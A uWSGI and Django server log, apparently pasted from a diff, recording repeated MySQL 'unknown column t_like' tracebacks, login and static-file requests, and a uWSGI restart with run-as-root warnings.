"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 492, in topic_manage + return render(request, 'admin-home.html', response) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/shortcuts.py", line 19, in render + content = loader.render_to_string(template_name, context, request, using=using) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string + return template.render(context, request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render + return self.template.render(context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 170, in render + return self._render(context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 162, in _render + return self.nodelist.render(context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 938, in render + bit = node.render_annotated(context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/base.py", line 905, in render_annotated + return self.render(context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/template/defaulttags.py", line 168, in render + len_values = len(values) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 21/33] 219.228.146.156 () {40 vars in 927 bytes} [Thu Jan 14 07:20:20 2021] GET /admin-home/ => generated 232495 bytes in 138 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: / +[pid: 32185|app: 0|req: 22/34] 113.96.232.116 () {32 vars in 487 bytes} [Thu Jan 14 07:22:16 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 32185|app: 0|req: 23/35] 219.228.146.146 () {36 vars in 615 bytes} [Thu Jan 14 07:22:27 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 32185|app: 0|req: 24/36] 219.228.146.146 () {34 vars in 526 bytes} [Thu Jan 14 07:22:30 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 32185|app: 0|req: 25/37] 219.228.146.146 () {36 vars in 691 bytes} [Thu Jan 14 07:23:56 2021] GET / => generated 3429 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 32185|app: 0|req: 26/38] 219.228.146.146 () {36 vars in 637 bytes} [Thu Jan 14 07:23:56 2021] GET /favicon.ico => generated 3480 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 27/39] 219.228.146.146 () {36 vars in 701 bytes} [Thu Jan 14 07:24:00 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 28/40] 219.228.146.146 () {36 vars in 703 bytes} [Thu Jan 14 07:24:00 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 32185|app: -1|req: -1/41] 219.228.146.146 () {38 vars in 726 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/42] 219.228.146.146 () {38 vars in 748 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/43] 219.228.146.146 () {38 vars in 730 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/44] 219.228.146.146 () {38 vars in 728 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/45] 219.228.146.146 () {38 vars in 734 bytes} [Thu Jan 14 07:24:00 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/46] 219.228.146.146 () {38 vars in 709 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/47] 219.228.146.146 () {38 vars in 707 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/48] 219.228.146.146 () {38 vars in 725 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/49] 219.228.146.146 () {38 vars in 723 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/50] 219.228.146.146 () {38 vars in 715 bytes} [Thu Jan 14 07:24:00 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/51] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:24:03 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/52] 219.228.146.146 () {38 vars in 754 bytes} [Thu Jan 14 07:24:03 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: 0|req: 29/53] 219.228.146.146 () {48 vars in 925 bytes} [Thu Jan 14 07:24:06 2021] POST /login/ => generated 27 bytes in 66 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 30/54] 219.228.146.146 () {40 vars in 882 bytes} [Thu Jan 14 07:24:06 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 31, in home + for t in recommends: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 31/55] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:24:06 2021] GET /home/ => generated 183082 bytes in 118 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 32185|app: 0|req: 32/56] 219.228.146.253 () {36 vars in 692 bytes} [Thu Jan 14 07:24:14 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 33/57] 219.228.146.253 () {36 vars in 694 bytes} [Thu Jan 14 07:24:14 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 32185|app: -1|req: -1/58] 219.228.146.253 () {38 vars in 717 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/59] 219.228.146.253 () {38 vars in 739 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/60] 219.228.146.253 () {38 vars in 721 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/61] 219.228.146.253 () {38 vars in 719 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/62] 219.228.146.253 () {38 vars in 725 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/63] 219.228.146.253 () {38 vars in 700 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/64] 219.228.146.253 () {38 vars in 698 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/65] 219.228.146.253 () {38 vars in 716 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/66] 219.228.146.253 () {38 vars in 706 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/67] 219.228.146.253 () {38 vars in 714 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/68] 219.228.146.253 () {38 vars in 771 bytes} [Thu Jan 14 07:24:17 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: -1|req: -1/69] 219.228.146.253 () {38 vars in 745 bytes} [Thu Jan 14 07:24:17 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 32185|app: 0|req: 34/70] 219.228.146.253 () {48 vars in 916 bytes} [Thu Jan 14 07:24:41 2021] POST /login/ => generated 27 bytes in 28 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 32185|app: 0|req: 35/71] 219.228.146.253 () {40 vars in 873 bytes} [Thu Jan 14 07:24:41 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 31, in home + for t in recommends: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'") +[pid: 32185|app: 0|req: 36/72] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:24:41 2021] GET /home/ => generated 183073 bytes in 101 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 32185|app: 0|req: 37/73] 219.228.146.253 () {38 vars in 766 bytes} [Thu Jan 14 07:24:52 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 32185|app: 0|req: 38/74] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 07:25:42 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 32185|app: 0|req: 39/75] 61.151.179.84 () {32 vars in 540 bytes} [Thu Jan 14 07:32:41 2021] GET / => generated 3429 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Gracefully killing worker 1 (pid: 32185)... +gateway "uWSGI http 1" has been buried (pid: 32186) +...gracefully killing workers... +worker 1 buried after 1 seconds +binary reloading uWSGI... +chdir() to /www/wwwroot/master +closing all non-uwsgi socket fds > 2 (max_fd = 100001)... +found fd 3 mapped to socket 0 (127.0.0.1:35412) +running /www/wwwroot/master/pyweb/bin/uwsgi +[uWSGI] getting INI configuration from uwsgi.ini +[uwsgi-static] added mapping for /static => /www/wwwroot/master/static +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 07:33:42 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8000 fd 5 +uwsgi socket 0 bound to TCP address 127.0.0.1:33392 (port auto-assigned) fd 4 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.6 (default, Jan 14 2021, 10:51:21) [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)] +Python main interpreter initialized at 0x1034e30 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1034e30 pid: 32183 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +gracefully (RE)spawned uWSGI master process (pid: 32183) +spawned uWSGI worker 1 (pid: 2069, cores: 2) +spawned uWSGI http 1 (pid: 2070) +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 15:34:21 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +probably another instance of uWSGI is running on the same address (0.0.0.0:8000). +bind(): Address already in use [core/socket.c line 769] +Not Found: / +[pid: 2069|app: 0|req: 1/1] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:34:29 2021] GET / => generated 3429 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 2/2] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:34:36 2021] GET /login/ => generated 6428 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/3] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) 